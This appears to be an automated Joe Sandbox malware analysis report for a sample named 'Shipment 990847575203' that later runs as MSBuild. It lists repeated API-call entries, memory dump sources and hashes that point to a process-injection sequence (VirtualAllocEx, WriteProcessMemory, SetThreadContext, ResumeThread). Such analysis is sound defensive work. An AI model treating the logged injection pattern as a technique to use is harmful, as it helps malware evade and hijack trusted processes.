                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ca0000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DrawText
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2175133113-0

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07CAC995,?,?), ref: 07CACA47
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439663321.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ca0000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DrawText
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2175133113-0

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07C9E8A0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439607427.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7c90000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3559483778-0

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0185D60F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2420449332.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1850000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3793708945-0

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07C9E6F6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439607427.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7c90000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 983334009-0

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07C9E980
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439607427.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7c90000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1726664587-0

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0185D60F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2420449332.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1850000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3793708945-0

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07CA3482,?,?,?,?,?), ref: 07CA3527
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439663321.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ca0000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFromIconResource
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3668623891-0

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 262 7c9e750-7c9e7cb VirtualAllocEx 265 7c9e7cd-7c9e7d3 262->265 266 7c9e7d4-7c9e7f9 262->266 265->266
                                                                                                                              APIs
                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07C9E7BE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439607427.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7c90000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4275171209-0
                                                                                                                              APIs
                                                                                                                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07CA3482,?,?,?,?,?), ref: 07CA3527
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439663321.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ca0000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFromIconResource
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3668623891-0
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439607427.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7c90000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ResumeThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 947044025-0
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0185B2FE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2420449332.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1850000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0
                                                                                                                              APIs
                                                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 07ED2925
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2440343413.0000000007ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07ED0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ed0000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 410705778-0
                                                                                                                              APIs
                                                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 07ED2925
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2440343413.0000000007ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07ED0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ed0000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 410705778-0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2419674216.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_155d000_Shipment 990847575203.jbxd
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2419674216.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_155d000_Shipment 990847575203.jbxd
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439607427.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7c90000_Shipment 990847575203.jbxd
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439607427.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7c90000_Shipment 990847575203.jbxd
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439607427.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7c90000_Shipment 990847575203.jbxd
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439607427.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7c90000_Shipment 990847575203.jbxd
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2420449332.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1850000_Shipment 990847575203.jbxd

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:15.3%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:159
                                                                                                                              Total number of Limit Nodes:12

                                                                                                                              Control-flow Graph

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640

                                                                                                                              Control-flow Graph

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640

                                                                                                                              Control-flow Graph

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640
                                                                                                                              • Opcode ID: 71e1eef7883933062af1c7c5740c9928f6e11765f8b082413fd9c343954997ba
                                                                                                                              • Instruction ID: 2e553053fb9e862f8cb865d43813b418d30cc6929965d8699319d83478714477
                                                                                                                              • Opcode Fuzzy Hash: 71e1eef7883933062af1c7c5740c9928f6e11765f8b082413fd9c343954997ba
                                                                                                                              • Instruction Fuzzy Hash: 92819374E00658CFDB14DFAAD884ADDBBF2BF88310F248069E419AB365EB349941CF51

                                                                                                                              Control-flow Graph

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640
                                                                                                                              • Opcode ID: 636a8e08809eaf63c4f0247992f8c60bbcdeef598f00965f0fb301baae6f5516
                                                                                                                              • Instruction ID: 3bedf229abe0da3fafeb08dc953982d4831f739294b1b87d5033458b6724d451
                                                                                                                              • Opcode Fuzzy Hash: 636a8e08809eaf63c4f0247992f8c60bbcdeef598f00965f0fb301baae6f5516
                                                                                                                              • Instruction Fuzzy Hash: BF81A374E00218DFDB14DFAAD984ADDBBF2BF88300F249169E419AB365DB349941DF50

                                                                                                                              Control-flow Graph

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640
                                                                                                                              • Opcode ID: 12fa71fed8187e8a29864173b888f33f19ee7b3ecad2c1295a2b58700c20526b
                                                                                                                              • Instruction ID: 9f1a03c2fb1a355958011d184312cb7283fca4bde18468615db3a35b03ea07c3
                                                                                                                              • Opcode Fuzzy Hash: 12fa71fed8187e8a29864173b888f33f19ee7b3ecad2c1295a2b58700c20526b
                                                                                                                              • Instruction Fuzzy Hash: B9819274E00658DFDB14DFAAD984ADDBBF2BF88300F248069E419AB365DB349981CF50

                                                                                                                              Control-flow Graph

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640
                                                                                                                              • Opcode ID: bd073bb170d568810c32a955388c15a442452830028a3c540876173c73514df2
                                                                                                                              • Instruction ID: 5b9a3b8d807ae659d16e8dde8cccb1bb2e5a5e19a7af732e28f8876ef5682f24
                                                                                                                              • Opcode Fuzzy Hash: bd073bb170d568810c32a955388c15a442452830028a3c540876173c73514df2
                                                                                                                              • Instruction Fuzzy Hash: 8A81B474E00658CFDB14DFAAD884ADDBBF2BF88310F248069E419AB365EB349941CF10
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op
                                                                                                                              • API String ID: 0-2001708241
                                                                                                                              • Opcode ID: 860992523ed9747729fa5b61de05597446a874ec7537c9c15c05700273ae75df
                                                                                                                              • Instruction ID: 427015eafd14d599f7f9c5bd06199f1fd1f1f541aa3d8900d9999aef1941a877
                                                                                                                              • Opcode Fuzzy Hash: 860992523ed9747729fa5b61de05597446a874ec7537c9c15c05700273ae75df
                                                                                                                              • Instruction Fuzzy Hash: 24619474E006489FDB18DFAAD944ADDBBF2BF88301F14C069D819AB365DB349945CF50
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op
                                                                                                                              • API String ID: 0-2001708241
                                                                                                                              • Opcode ID: bd028b911814812178a29a38b6fdeb05b9675fcddf6933da33c57011102eff64
                                                                                                                              • Instruction ID: cffb0fc4a57bfdf57235b63b17b7a7e97659feb83ce20142e0b2e76cd4c64252
                                                                                                                              • Opcode Fuzzy Hash: bd028b911814812178a29a38b6fdeb05b9675fcddf6933da33c57011102eff64
                                                                                                                              • Instruction Fuzzy Hash: BC51A575E006489FDB18DFAAD984ADEBBF2BF88300F14C069E418AB365DB349941DF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: eb51cd1a0ad3f157ca0bba4d1464c2e6c8ac393223107bd7172037f1ccc63c1b
                                                                                                                              • Instruction ID: e65513a4d099afdf7fb9ca75368cf4c7f38c6c98b76c052285dab1284e46eddc
                                                                                                                              • Opcode Fuzzy Hash: eb51cd1a0ad3f157ca0bba4d1464c2e6c8ac393223107bd7172037f1ccc63c1b
                                                                                                                              • Instruction Fuzzy Hash: B0A27C70A00209DFCB15CFA8C584AEEBBF2BF88300F158569E455DB2A5D731ED85DB62
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a7ba4ded8620bf51ab037f2365311fe51712c8a600d3bf2363919b3d4bae26d4
                                                                                                                              • Instruction ID: 96d342b756eb795c5ada10e9d01e409a226110728a7c8884a966458eb63aa800
                                                                                                                              • Opcode Fuzzy Hash: a7ba4ded8620bf51ab037f2365311fe51712c8a600d3bf2363919b3d4bae26d4
                                                                                                                              • Instruction Fuzzy Hash: CB128B70A00209CFDB14DF69C894AAEBBF6BF88300F248569E815DB395DF349E45DB90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b7b38d7f943f222598c49a7148076cac979af2445d4cdd7f39b1f2de4d143a89
                                                                                                                              • Instruction ID: ff21d1f9cc853092898c740e69f25ecba3f1e3f97ce1538c8fd8a3f71ee4888a
                                                                                                                              • Opcode Fuzzy Hash: b7b38d7f943f222598c49a7148076cac979af2445d4cdd7f39b1f2de4d143a89
                                                                                                                              • Instruction Fuzzy Hash: 88025E30A04209DFCB15CFA9D984AEEBBF2BF88301F158566E815AB261D730DE45DF51
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e91b5bb5d43d56a01dbc453a43818c16ab1999b581455eb2b5aeaaccb6849a79
                                                                                                                              • Instruction ID: fd49772486d75f2a66a57c742177226fdc8528e6aea490abf408795e688b5bc9
                                                                                                                              • Opcode Fuzzy Hash: e91b5bb5d43d56a01dbc453a43818c16ab1999b581455eb2b5aeaaccb6849a79
                                                                                                                              • Instruction Fuzzy Hash: E0518274E00608DFDB18DFAAD894A9DBBF6BF89700F248129E815AB365DB309941CF54
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9ec292f5ff073df66fb4fc288fdd9ac16d9a795a4d49dd42afe02c60055c57b8
                                                                                                                              • Instruction ID: df5a5abd6970af3b607676ee8e507c73630fefc8237b43d965b67f2b7ef7a8b4
                                                                                                                              • Opcode Fuzzy Hash: 9ec292f5ff073df66fb4fc288fdd9ac16d9a795a4d49dd42afe02c60055c57b8
                                                                                                                              • Instruction Fuzzy Hash: 10519374E00208DFDB18DFAAD894ADDBBB2BF88700F248129E815BB365DB305941CF14

                                                                                                                              Control-flow Graph

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640
                                                                                                                              • Opcode ID: 359e9f54e9346d67fb37b27d4f9ab1a877e9d05e2f95a5bc15665ebf99bc3187
                                                                                                                              • Instruction ID: cff5e19ed20623c8c22be981be38484ed7c42f8772c5775b2bb772ff1d2d9c58
                                                                                                                              • Opcode Fuzzy Hash: 359e9f54e9346d67fb37b27d4f9ab1a877e9d05e2f95a5bc15665ebf99bc3187
                                                                                                                              • Instruction Fuzzy Hash: B971A174E00258CFDB14DFA9D884ADDBBB2BF49310F2480A9E859AB365DB349D81DF50

                                                                                                                              Control-flow Graph

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3574749457.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_a90000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00A97A42
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3574749457.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_a90000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 716092398-0

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00A97A42
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3574749457.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_a90000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 716092398-0

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 00A9A131
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3574749457.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_a90000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallProcWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2714655100-0

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00A9C60D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3574749457.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_a90000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Initialize
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2538663250-0

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,00A9576C), ref: 00A959A6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3574749457.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_a90000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00A9C60D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3574749457.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_a90000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Initialize
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2538663250-0

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00A9C60D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3574749457.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_a90000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Initialize
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2538663250-0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a84b1b13e66f72dc7cc4c17f5678951569071133b367a773df51eba413ef654a
                                                                                                                              • Instruction ID: a8821f1b8acd250d1b2f9269d44afc301c5c701834d28977d4d3ae068a7585b8
                                                                                                                              • Opcode Fuzzy Hash: a84b1b13e66f72dc7cc4c17f5678951569071133b367a773df51eba413ef654a
                                                                                                                              • Instruction Fuzzy Hash: E4124A30A04249CFCB15CF69D884AEEBBF1EF89314F158699E815AB3A1DB31ED41CB50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.3577082595.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_cb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
